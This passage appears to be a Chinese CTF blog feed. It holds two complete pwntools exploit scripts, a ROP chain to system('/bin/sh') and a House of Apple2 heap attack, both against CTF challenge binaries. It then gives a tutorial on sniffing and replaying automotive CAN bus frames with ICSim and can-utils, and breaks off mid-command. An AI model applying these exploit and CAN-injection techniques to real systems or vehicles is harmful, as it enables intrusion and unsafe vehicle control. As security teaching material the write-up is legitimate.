class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> ctypes <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> struct <span class="hljs-keyword">import</span> pack<br>banary = <span class="hljs-string">"./pwn1"</span><br>elf = ELF(banary)<br>libc = ELF(<span class="hljs-string">"./libc.so.6"</span>)<br><span class="hljs-comment">#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")</span><br>ip = <span class="hljs-string">''</span><br>port = <span class="hljs-number">0</span><br>local = <span class="hljs-number">0</span><br><span class="hljs-keyword">if</span> local:<br> io = process(banary)<br><span class="hljs-keyword">else</span>:<br> io = remote(<span class="hljs-string">"pwn-802264e403.challenge.xctf.org.cn"</span>, <span class="hljs-number">9999</span>, ssl=<span class="hljs-literal">True</span>)<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'amd64'</span>)<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">dbg</span>():<br> gdb.attach(io)<br> pause()<br><br>s = <span class="hljs-keyword">lambda</span> data : io.send(data)<br>sl = <span class="hljs-keyword">lambda</span> data : io.sendline(data)<br>sa = <span class="hljs-keyword">lambda</span> text, data : io.sendafter(text, data)<br>sla = <span class="hljs-keyword">lambda</span> text, data : io.sendlineafter(text, data)<br>r = <span class="hljs-keyword">lambda</span> : io.recv()<br>ru = <span class="hljs-keyword">lambda</span> text : io.recvuntil(text)<br>uu32 = <span class="hljs-keyword">lambda</span> : u32(io.recvuntil(<span class="hljs-string">b"\xff"</span>)[-<span class="hljs-number">4</span>:].ljust(<span class="hljs-number">4</span>, <span class="hljs-string">b'\x00'</span>))<br>uu64 = <span class="hljs-keyword">lambda</span> : u64(io.recvuntil(<span class="hljs-string">b"\x7f"</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b"\x00"</span>))<br>iuu32 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">10</span>),<span class="hljs-number">16</span>)<br>iuu64 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">6</span>),<span class="hljs-number">16</span>)<br>uheap = <span class="hljs-keyword">lambda</span> : u64(io.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b'\x00'</span>))<br>lg = <span class="hljs-keyword">lambda</span> data : io.success(<span class="hljs-string">'%s -> 0x%x'</span> % (data, <span class="hljs-built_in">eval</span>(data)))<br>ia = <span class="hljs-keyword">lambda</span> : io.interactive()<br><br>libc1 = cdll.LoadLibrary(<span class="hljs-string">'./libc.so.6'</span>)<br>num=libc1.rand()<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">5</span>):<br> ru(<span class="hljs-string">"请输入下棋的位置(行 列):"</span>)<br> sl(<span class="hljs-string">"0 "</span>+<span class="hljs-built_in">str</span>(i))<br>ru(<span class="hljs-string">b'want to say?'</span>)<br>s(<span class="hljs-string">b'a'</span>*<span class="hljs-number">0x8</span>+<span class="hljs-string">b'\x08\x15'</span>)<br><br>ru(<span class="hljs-string">"Do you want to end the game [Y/N]\n"</span>)<br>sl(<span class="hljs-string">"N"</span>)<br><br>ru(<span class="hljs-string">":"</span>)<br>sl(<span class="hljs-string">"70 "</span>+<span class="hljs-built_in">str</span>(<span class="hljs-number">50</span>))<br>ru(<span class="hljs-string">b'administrator key'</span>)<br>sl(<span class="hljs-built_in">str</span>(num))<br><br>ru(<span class="hljs-string">"logged in!\n"</span>)<br>sl(<span class="hljs-string">"/proc/self/maps"</span>)<br>ru(<span class="hljs-string">"as follows >>\n"</span>)<br>base=<span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">12</span>),<span class="hljs-number">16</span>)<br>lg(<span class="hljs-string">"base"</span>)<br>io.recvline()<br>io.recvline()<br>io.recvline()<br>libcbase = <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">12</span>),<span class="hljs-number">16</span>)<br>lg(<span class="hljs-string">"libcbase"</span>)<br>system=libcbase+libc.sym[<span class="hljs-string">'system'</span>]<br>bin_sh=libcbase+<span class="hljs-built_in">next</span>(libc.search(<span class="hljs-string">b'/bin/sh\x00'</span>))<br>pop_rdi=libcbase+<span class="hljs-number">0x000000000002164f</span><br>add_rsp=libcbase+<span class="hljs-number">0x0000000000154553</span><span class="hljs-comment">#add rsp, 0x50 ; pop rbx ; pop rbp ; pop r12 ; ret</span><br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">10</span>):<br> io.recvline()<br><br>stack = <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">12</span>),<span class="hljs-number">16</span>) + <span class="hljs-number">0x1E518</span><br>lg(<span class="hljs-string">"stack"</span>)<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">5</span>):<br> ru(<span class="hljs-string">"请输入下棋的位置(行 列):"</span>)<br> sl(<span class="hljs-string">"0 "</span>+<span class="hljs-built_in">str</span>(i))<br><br>ru(<span class="hljs-string">b'want to say?'</span>)<br>payload=<span class="hljs-string">b'a'</span>*<span class="hljs-number">0x8</span>+p64(add_rsp)+p64(pop_rdi)+p64(pop_rdi) + p64(bin_sh) + p64(system)<br>s(payload)<br>ru(<span class="hljs-string">"Do you want to end the game [Y/N]\n"</span>)<br>sl(<span class="hljs-string">"N"</span>)<br>ru(<span class="hljs-string">"请输入下棋的位置(行 列):"</span>)<br>sl(<span class="hljs-string">"70 "</span>+<span class="hljs-built_in">str</span>(<span class="hljs-number">50</span>))<br><br><span class="hljs-comment"># sl(b'cd /home/ctf')</span><br><span class="hljs-comment"># sl(b'./pwn2 -c flag_read flag')</span><br><span class="hljs-comment"># sleep(10)</span><br><span class="hljs-comment"># sl(b'cat flag_read')</span><br><br><br>ia()<br></code></pre></td></tr></table></figure><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202410200121631.png" alt="屏幕截图 2024-10-19 215500"></p><h2 id="guest-book"><a href="#guest-book" class="headerlink" title="guest book"></a>guest book</h2><p>标准的菜单,2.35有uaf直接打apple2就可以了</p><figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br></pre></td><td class="code"><pre><code class="hljs vim">from pwn import *<br>from ctypes import *<br>from struct import pack<br>banary = <span class="hljs-string">"./pwn"</span><br>elf = ELF(banary)<br>libc = ELF(<span class="hljs-string">"./libc.so.6"</span>)<br>#libc=ELF(<span class="hljs-string">"/lib/x86_64-linux-gnu/libc.so.6"</span>)<br>ip = <span class="hljs-string">''</span><br>port = <span class="hljs-number">0</span><br>local = <span class="hljs-number">0</span><br><span class="hljs-keyword">if</span> local:<br> io = process(banary)<br><span class="hljs-keyword">else</span>:<br> io = remote(ip,port)<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'amd64'</span>)<br>#context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'i386'</span>)<br><br>def dbg():<br> gdb.attach(io)<br> pause()<br><br>s = lambda data : io.send(data)<br><span class="hljs-keyword">sl</span> = lambda data : io.sendline(data)<br><span class="hljs-keyword">sa</span> = lambda text, data : io.sendafter(text, data)<br><span class="hljs-keyword">sla</span> = lambda text, data : io.sendlineafter(text, data)<br>r = lambda : io.recv()<br><span class="hljs-keyword">ru</span> = lambda text : io.recvuntil(text)<br>uu32 = lambda : u32(io.recvuntil(<span class="hljs-keyword">b</span><span class="hljs-string">"\xff"</span>)[-<span class="hljs-number">4</span>:].ljust(<span class="hljs-number">4</span>, <span class="hljs-keyword">b</span><span class="hljs-string">'\x00'</span>))<br>uu64 = lambda : u64(io.recvuntil(<span class="hljs-keyword">b</span><span class="hljs-string">"\x7f"</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, <span class="hljs-keyword">b</span><span class="hljs-string">"\x00"</span>))<br>iuu32 = lambda : <span class="hljs-keyword">int</span>(io.recv(<span class="hljs-number">10</span>),<span class="hljs-number">16</span>)<br>iuu64 = lambda : <span class="hljs-keyword">int</span>(io.recv(<span class="hljs-number">6</span>),<span class="hljs-number">16</span>)<br>uheap = lambda : u64(io.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-keyword">b</span><span class="hljs-string">'\x00'</span>))<br><span class="hljs-keyword">lg</span> = lambda data : io.success(<span class="hljs-string">'%s -> 0x%x'</span> % (data, <span class="hljs-built_in">eval</span>(data)))<br><span class="hljs-keyword">ia</span> = lambda : io.interactive()<br><br>def cmd(choice):<br> <span class="hljs-keyword">ru</span>(<span class="hljs-string">">"</span>)<br> <span class="hljs-keyword">sl</span>(str(choice))<br><br>def <span class="hljs-built_in">add</span>(<span class="hljs-built_in">index</span>,size):<br> cmd(<span class="hljs-number">1</span>)<br> <span class="hljs-keyword">ru</span>(<span class="hljs-string">"[+] input your index"</span>)<br> <span class="hljs-keyword">sl</span>(str(<span class="hljs-built_in">index</span>))<br> <span class="hljs-keyword">ru</span>(<span class="hljs-string">"[+] input your size"</span>)<br> <span class="hljs-keyword">sl</span>(str(size))<br><br>def <span class="hljs-keyword">edit</span>(<span class="hljs-built_in">index</span>,content):<br> cmd(<span class="hljs-number">2</span>)<br> <span class="hljs-keyword">ru</span>(<span class="hljs-string">"[+] input your index"</span>)<br> <span class="hljs-keyword">sl</span>(str(<span class="hljs-built_in">index</span>))<br> <span class="hljs-keyword">ru</span>(<span class="hljs-string">"[+] input your content"</span>)<br> s(content)<br><br>def <span class="hljs-keyword">delete</span>(<span class="hljs-built_in">index</span>):<br> cmd(<span class="hljs-number">3</span>)<br> <span class="hljs-keyword">ru</span>(<span class="hljs-string">"[+] input your index"</span>)<br> <span class="hljs-keyword">sl</span>(str(<span class="hljs-built_in">index</span>))<br><br>def show(<span class="hljs-built_in">index</span>):<br> cmd(<span class="hljs-number">4</span>)<br> <span class="hljs-keyword">ru</span>(<span class="hljs-string">"[+] input your index"</span>)<br> <span class="hljs-keyword">sl</span>(str(<span class="hljs-built_in">index</span>))<br><br><br><span class="hljs-built_in">add</span>(<span class="hljs-number">0</span>,<span class="hljs-number">0</span>x520)<br><span class="hljs-built_in">add</span>(<span class="hljs-number">1</span>,<span class="hljs-number">0</span>x500)<br><span class="hljs-built_in">add</span>(<span class="hljs-number">2</span>,<span class="hljs-number">0</span>x510)<br><br><span class="hljs-keyword">delete</span>(<span class="hljs-number">0</span>)<br><span class="hljs-built_in">add</span>(<span class="hljs-number">3</span>,<span class="hljs-number">0</span>x560)<br><span class="hljs-keyword">delete</span>(<span class="hljs-number">2</span>)<br><br>show(<span class="hljs-number">0</span>)<br>io.recv()<br>libcbase=u64(io.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-keyword">b</span><span class="hljs-string">'\x00'</span>))-<span class="hljs-number">0</span>x21b110<br><span class="hljs-keyword">lg</span>(<span class="hljs-string">"libcbase"</span>)<br>one=[<span class="hljs-number">0</span>x50a47,<span class="hljs-number">0</span>xebc81,<span class="hljs-number">0</span>xebc85,<span class="hljs-number">0</span>xebc88,<span class="hljs-number">0</span>xebce2,<span class="hljs-number">0</span>xebd3f,<span class="hljs-number">0</span>xebd43]<br>onegadget=libcbase+one[<span class="hljs-number">1</span>]<br>l_next=libcbase+<span class="hljs-number">0</span>x3fe890<br>rtld_global=libcbase+<span class="hljs-number">0</span>x3fd040<br><span class="hljs-built_in">system</span>=libcbase+libc.sym[<span class="hljs-string">'system'</span>]<br>bin_sh=libcbase+<span class="hljs-keyword">next</span>(libc.<span class="hljs-built_in">search</span>(<span class="hljs-keyword">b</span><span class="hljs-string">'/bin/sh\x00'</span>))<br>setcontext=libcbase+libc.sym[<span class="hljs-string">'setcontext'</span>]+<span class="hljs-number">61</span><br>_IO_list_all = libcbase + libc.sym[<span class="hljs-string">'_IO_list_all'</span>]<br><span class="hljs-keyword">ret</span>=libcbase+<span class="hljs-number">0</span>x0000000000029139<br>pop_rdi=libcbase+<span class="hljs-number">0</span>x000000000002a3e5<br><span class="hljs-keyword">lg</span>(<span class="hljs-string">"l_next"</span>)<br><span class="hljs-keyword">lg</span>(<span class="hljs-string">"rtld_global"</span>)<br><br><span class="hljs-keyword">edit</span>(<span class="hljs-number">0</span>,<span class="hljs-keyword">b</span><span class="hljs-string">'A'</span>*<span class="hljs-number">0</span>x10)<br>show(<span class="hljs-number">0</span>)<br><span class="hljs-keyword">ru</span>(<span class="hljs-keyword">b</span><span class="hljs-string">'A'</span>*<span class="hljs-number">0</span>x10)<br>heapbase=uheap()-<span class="hljs-number">0</span>x290<br><span class="hljs-keyword">lg</span>(<span class="hljs-string">"heapbase"</span>)<br><span class="hljs-keyword">edit</span>(<span class="hljs-number">0</span>,p64(libcbase+<span class="hljs-number">0</span>x21b110)*<span class="hljs-number">2</span>+p64(heapbase+<span class="hljs-number">0</span>x290)+p64(_IO_list_all-<span class="hljs-number">0</span>x20))<br><br><br><span class="hljs-built_in">add</span>(<span class="hljs-number">4</span>,<span class="hljs-number">0</span>x590)<br><br>fake_heap=heapbase+<span class="hljs-number">0</span>x1200<br>IO_wfile_jumps = libcbase + <span class="hljs-number">0</span>x2170c0<br><span class="hljs-keyword">lg</span>(<span class="hljs-string">"fake_heap"</span>)<br>fake_file = <span class="hljs-keyword">b</span><span class="hljs-string">''</span><br>fake_file = p64(<span class="hljs-number">0</span>)+p64(<span class="hljs-number">1</span>)<br>fake_file = fake_file.ljust(<span class="hljs-number">0</span>x80,<span class="hljs-keyword">b</span><span class="hljs-string">'\x00'</span>)+p64(fake_heap)<br>fake_file = fake_file.ljust(<span class="hljs-number">0</span>xb8,<span class="hljs-keyword">b</span><span class="hljs-string">'\x00'</span>)+p64(IO_wfile_jumps)<br>payload = cyclic(<span class="hljs-number">0</span>x10)+fake_file<br><span class="hljs-keyword">edit</span>(<span class="hljs-number">2</span>,payload)<br><br>payload = <span class="hljs-keyword">b</span><span class="hljs-string">''</span><br>payload = payload.ljust(<span class="hljs-number">0</span>x58,<span class="hljs-keyword">b</span><span class="hljs-string">'\x00'</span>)+p64(setcontext)<br>payload = payload.ljust(<span class="hljs-number">0</span>xa0,<span class="hljs-keyword">b</span><span class="hljs-string">'\x00'</span>)+p64(fake_heap+<span class="hljs-number">0</span>xf0)+p64(<span class="hljs-keyword">ret</span>)<br>payload = payload.ljust(<span class="hljs-number">0</span>xc0,<span class="hljs-keyword">b</span><span class="hljs-string">'\x00'</span>)+p64(fake_heap)+p64(<span class="hljs-number">0</span>)*<span class="hljs-number">3</span>+p64(fake_heap-<span class="hljs-number">0</span>x10)+p64(<span class="hljs-number">0</span>)<br>payload +=p64(pop_rdi)+p64(bin_sh)+p64(<span class="hljs-built_in">system</span>)<br><span class="hljs-keyword">edit</span>(<span class="hljs-number">3</span>,payload)<br><br>cmd(<span class="hljs-number">5</span>)<br><span class="hljs-keyword">ia</span>()<br></code></pre></td></tr></table></figure>]]></content>
</entry>
<entry>
<title>车联网can总线协议初探</title>
<link href="/2024/08/13/%E8%BD%A6%E8%81%94%E7%BD%91can%E6%80%BB%E7%BA%BF%E5%8D%8F%E8%AE%AE%E5%88%9D%E6%8E%A2/"/>
<url>/2024/08/13/%E8%BD%A6%E8%81%94%E7%BD%91can%E6%80%BB%E7%BA%BF%E5%8D%8F%E8%AE%AE%E5%88%9D%E6%8E%A2/</url>
<content type="html"><![CDATA[<h1 id="can总线协议"><a href="#can总线协议" class="headerlink" title="can总线协议"></a>can总线协议</h1><p>CAN总线协议(Controller Area Network)是一种用于车联网的串行通信协议。它最初由德国Bosch公司在20世纪80年代为汽车电子控制系统而开发,旨在解决不同电子控制单元(ECU)之间的通信问题。以下是CAN总线协议的一些关键特点:</p><ol><li><strong>高可靠性和实时性</strong>:CAN协议支持快速的数据传输和错误检测与纠正,确保了通信的高可靠性和实时性。</li><li><strong>多主架构</strong>:CAN总线是一种多主(multi-master)架构,这意味着任何节点都可以在总线上发送消息,无需中央控制器。</li><li><strong>短帧格式</strong>:CAN总线使用短帧格式(8字节的数据),这使得通信效率高,且可以满足汽车控制系统对实时性的要求。</li><li><strong>错误检测机制</strong>:CAN协议具有多种错误检测机制,如位填充、帧校验、应答校验和错误检测码,以确保数据传输的完整性和可靠性。</li><li><strong>消息优先级</strong>:CAN总线协议使用消息标识符来确定优先级。较低数值的标识符拥有更高的优先级,这使得紧急信息可以优先传输。</li><li><strong>速度和距离</strong>:CAN协议支持的最大传输速率可达1Mbps,但速率和距离成反比。典型的汽车应用中,CAN总线的长度可达几百米。</li><li><strong>应用广泛</strong>:除了汽车领域,CAN总线协议还广泛应用于工业自动化、医疗设备和其他需要可靠通信的嵌入式系统中。</li><li><strong>扩展性</strong>:CAN总线可以与其他网络协议(如CAN FD、LIN、FlexRay等)集成,以满足更高的数据速率和功能需求。</li></ol><p>CAN总线协议在车联网中发挥着关键作用,使得不同的汽车电子控制单元可以有效地协同工作,提升了汽车的智能化和自动化水平。</p><h2 id="ICSim模拟"><a href="#ICSim模拟" class="headerlink" title="ICSim模拟"></a>ICSim模拟</h2><p>ICSim 包括一个带有车速表、门锁指示灯、转向信号灯和控制面板的仪表板。模拟控制器允许用户与模拟汽车网络进行交互,应用加速、刹车、控制门锁和转向信号。所以可以通过ICSim模拟汽车的行为,并抓取ICSim的can报文</p><p>安装ICSim环境,需要首先安装ICSim所需依赖库:</p><figure class="highlight q"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs q">sudo apt install libsdl2-<span class="hljs-built_in">dev</span> libsdl2-image-<span class="hljs-built_in">dev</span><br></code></pre></td></tr></table></figure><p>要发送、接收和分析 CAN 包,我们需要 CAN 分析工具。Can-utils 是一组 Linux 实用程序,允许 Linux 与车载 CAN 网络进行通信。Can-utils 包含 4个我们经常使用的主要工具:</p><figure class="highlight cmake"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs cmake">sudo apt <span class="hljs-keyword">install</span> can-utils<br><span class="hljs-comment">#candump : 显示、过滤和记录CAN数据到文件。candump并不会解码数据。</span><br><span class="hljs-comment">#canplayer : 对记录的CAN数据进行重放。</span><br><span class="hljs-comment">#cansend : 发送CAN数据。</span><br><span class="hljs-comment">#cansniffer : 显示CAN数据并高亮显示变化的字节。</span><br></code></pre></td></tr></table></figure><p>然后将ICSim下载下来</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">git clone https:<span class="hljs-regexp">//gi</span>thub.com<span class="hljs-regexp">/zombiecraig/</span>IcSim.git<br></code></pre></td></tr></table></figure><p>切换到ICSim目录,执行”make”命令,就可以编译成功。编译成功后,先运行setup_vcan.sh文件创建vcan0网卡</p><p>然后执行./icsim vcan0</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202408131003544.png" alt="image-20240813100329415"></p><p>接着另起一个窗口执行./controls vcan0</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202408131004729.png" alt="image-20240813100452654"></p><p>下面,我们可以使用如下键位来操作控制器</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs awk"><br>上方向键加速<br>向左方向键左转<br>向右方向键右转<br>右shift+A<span class="hljs-regexp">/X开左车门(前/</span>后)<br>右shift+B<span class="hljs-regexp">/Y开右前车门(前/</span>后)<br>左shift+A<span class="hljs-regexp">/X关左车门(前/</span>后)<br>左shift+B<span class="hljs-regexp">/Y关右前车门(前/</span>后)<br></code></pre></td></tr></table></figure><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202408131005244.png" alt="image-20240813100521151"></p><p>我们可以使用”candump vcan0”来抓取CAN包裹流量,这时我们对控制器进行操作就会抓取相应命令的流量。如下图,左侧可以看到抓取的流量直接打印到屏幕上,显示流量时还是比较乱的</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202408131006601.png" alt="image-20240813100645439"></p><p>这时我们可以使用”candump -l vcan0”,candump会自动将抓取的流量包放入candump-xxx.log文件中</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202408131007805.png" alt="image-20240813100726682"></p><p>想要停止抓取可以按”ctrl+c”。查看一下抓取流量包,第一列,括号内的是时间戳,第二列中vcan0为我们的虚拟can接口。后面的是ID和数据,ID和数据以#号分割。</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202408131007685.png" alt="image-20240813100759574"></p><p>candump可以监听并记录原始数据,会有很多对我们无用的数据。can-utils工具包中还有一款可以根据仲裁ID进行分组显示,并对变化的数据以红色显示,使我们比较容易分辨,它就是cansniffer。我们使用”cansniffer -c vcan0”命令来对vcan0进行监听。</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202408131008510.png" alt="image-20240813100858367"></p><p>我们可以测试一下,当我按下左方向键时,仪表盘开始出现左转向的灯。同时左侧的流量包开始变动,但是不太好观察到哪里出现了变化。</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202408131014563.png" alt="image-20240813101429325"></p><p>看网上的文章可以截图将ID这 一列固定在左侧,然后进行左转向的时候观察哪里发生了变化,这里就不详细截图了,直接说结果吧,最终发现”188#01000000”这一条是对转向进行操作的包裹,然后用同样的方法可以发现右转向是”188#02000000”,我们也可以使用cansend进行验证</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">cansend</span> vcan0 <span class="hljs-number">188</span>#<span class="hljs-number">01000000</span><br></code></pre></td></tr></table></figure><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202408131019950.png" alt="image-20240813101951792"></p><p>测试加油的指令时,上面的操作也可以比较方便的分析出加油指令ID和数据。这里不在重复讲解,上面的方法固然好用,但是也有不适用的时候,比如情况比较复杂,出现的ID变化或者较多。我们还有一种方法可以分析出对车辆的指令。我们首先使用”candump -l vcan0”进行流量抓取,抓取过程中进行加油门操作,然后松开油门,使其速度将为最低,最后停止抓取流量。<br>这样一来,整个的过程就可以抓取到log文件中。我们使用重放的发送,发送这个log文件中的所有内容。<img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202408131022742.png" alt="image-20240813102210584"></p><p>命令如下,使用”canplayer -I candump-xxx.log”命令就会将抓取到的流量重新发送一边。发送后可以观察到我们上面加速和减速的整个过程,接下里我们就要使用二分法截取加速的部分。</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202408131023931.png" alt="image-20240813102303776"></p><p>最后经过分析,发现”244#0000001xxx”即为加速指令。我们重放后,可以观察到加速现象。</p><h1 id="Fuzzing"><a href="#Fuzzing" class="headerlink" title="Fuzzing"></a>Fuzzing</h1><p>我们可以使用savvyCAN工具对can协议进行fuzz测试。</p><p>savvyCAN安装过程如下,</p><p>首先需要安装qt环境,这里我使用5.14.2版本(<a href="https://download.qt.io/archive/qt/5.14/5.14.2/)(savvyCAN%E7%8E%AF%E5%A2%83%E8%A6%81%E6%B1%82%3E=5.14.0%E7%89%88%E6%9C%AC)%EF%BC%8C%E4%B8%8B%E8%BD%BD%22.run%22%E7%9A%84%E5%9C%A8%E7%BA%BF%E5%AE%89%E8%A3%85%E7%A8%8B%E5%BA%8F%EF%BC%8C%E7%84%B6%E5%90%8E%E5%85%B6%E8%B5%8B%E4%BA%88%E6%89%A7%E8%A1%8C%E6%9D%83%E9%99%90">https://download.qt.io/archive/qt/5.14/5.14.2/)(savvyCAN环境要求>=5.14.0版本),下载".run"的在线安装程序,然后其赋予执行权限</a>(chmod 755 qt-xxx.run),使用”./qt-xxx.run”进行安装,这里我安装完毕后的目录为”~/Qt5.14.2/5.14.2”。</p><h2 id="SavvyCAN的安装"><a href="#SavvyCAN的安装" class="headerlink" title="SavvyCAN的安装"></a>SavvyCAN的安装</h2><p>安装SavvyCAN是一个非常容易和简单的过程。您可以通过https://<a href="http://www.savvycan.com/">www.savvycan.com</a>,下载适用于Linux、Mac和Windows平台的预编译二进制文件。</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">wget https:<span 